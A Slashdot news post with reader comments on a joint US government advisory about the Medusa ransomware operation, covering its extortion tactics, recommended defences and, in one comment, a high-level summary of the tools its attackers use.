Become a fan of Slashdot on Facebook

 



Forgot your password?
typodupeerror
×
Crime Networking Security IT

Cybersecurity Alert Warns of 300 Attacks with 'Medusa' Ransomware (theregister.com) 15

A ransomware-as-a-service variant called "Medusa" has claimed over 300 victims in "critical infrastructure sectors" (including medical), according to an joint alert from CISA, the FBI, and the Multi-State Information Sharing Analysis Center.

And that alert reminds us that Medusa is a globe-spanning operation that recruits third-party affiliates to plant ransomware and negotiate with victims, notes the Register. "Even organizations that have good ransomware recovery regimes, meaning they don't need to unscramble encrypted data as they have good backups and fall-back plans, may consider paying to prevent the release of their stolen data, given the unpleasant consequences that follow information leaks. Medusa actors also set a deadline for victims to pay ransoms and provide a countdown timer that makes it plain when stolen info will be sprayed across the internet. If victims cough up $10,000 in cryptocurrency, the crims push the deadline forward by 24 hours.

The advisory reveals one Medusa actor has taken things a step further. "FBI investigations identified that after paying the ransom, one victim was contacted by a separate Medusa actor who claimed the negotiator had stolen the ransom amount already paid," the advisory states. That separate actor then "requested half of the payment be made again to provide the 'true decryptor'," the advisory states, describing this incident as "potentially indicating a triple extortion scheme."

The security groups' advisory stresses that they "do not encourage paying ransoms as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations..." (But "Regardless of whether you or your organization have decided to pay the ransom, FBI, CISA, and MS-ISAC urge you to promptly report ransomware incidents...)

Besides updating software and operating systems, the alert makes these recommendations for organizations:
  • Require VPNs (or jump hosts) for remote network access
  • Block remote access from unknown/untrusted origins, and disable unused ports
  • Segment networks to help prevent the spread of ransomware
  • Use a networking monitoring tool to spot and investigate abnormal activity — including lateral movement (using endpoint detection and response tools). Log all network traffic, and monitor it for unauthorized scanning and access attempts.
  • Create recovery plans with encrypted offline backups of sensitive/proprietary data and servers
  • Require multifactor authentication, use strong (and long) passwords, and "consider not requiring frequently recurring password changes, as these can weaken security." (Also audit access control following the principle of least privilege, and watch for new and/or unrecognized accounts.)
  • Disable command-line and scripting activities and permissions.

Cybersecurity Alert Warns of 300 Attacks with 'Medusa' Ransomware

Comments Filter:
  • Physical. Layer. Switch.... You're welcome ;-) https://www.printables.com/mod... [printables.com]
    • Thanks. But no thanks. Any decent server can do all that and more.
      • "Thanks. But no thanks. Any decent server can do all that and more." Negative... Servers do not power off unused backup volumes. Aka, not a physical layer of protection. Anything not air gapped, can be infected. Period. A powered down hard drive... CANNOT! ;-)
  • Those "recommendations" are primarily aimed at the mouth-breathing end users who will engage with pretty much any piece of digital garbage in the mistaken belief that they're awesome and fark personal responsibility

    Until we're allowed to fire these chuckledinks, this state of affairs will persist.

  • ...may not always be the solution but some of these scammers could probably benefit from an epic ass whoopin.

    Would love to see a video where these bastards get raided by the cops AND their mothers with belts/chanclas/paddles in hand.

  • DOGE probably fucked cybersecurity investigations team also.

  • Disable command-line and scripting activities and permissions.

    Wait.. .What?

    • They target windows machines. Makes sense to deactivate scripting in machines used by the corporate Excel drones.

      Attack chains mounted by the ransomware syndicate involve the exploitation of known security flaws in public-facing applications, mainly Microsoft Exchange Server, to obtain initial access.

      Once gaining a successful foothold, the hackers drop use remote management and monitoring (RMM) software such as SimpleHelp, AnyDesk, or MeshAgent for persistent access, and employ the tried-and-tested Bring Your Own Vulnerable Driver (BYOVD) technique to terminate antivirus processes using KillAV.

      Some of the other tools deployed over the course of a Medusa ransomware attack include Navicat to access and run database queries, RoboCopy, and Rclone for data exfiltration
      https://thehackernews.com/2025... [thehackernews.com]

    • by shanen ( 462549 )

      Mod parent up and I am also interested in doing this...

"Regardless of the legal speed limit, your Buick must be operated at speeds faster than 85 MPH (140kph)." -- 1987 Buick Grand National owners manual.

Working...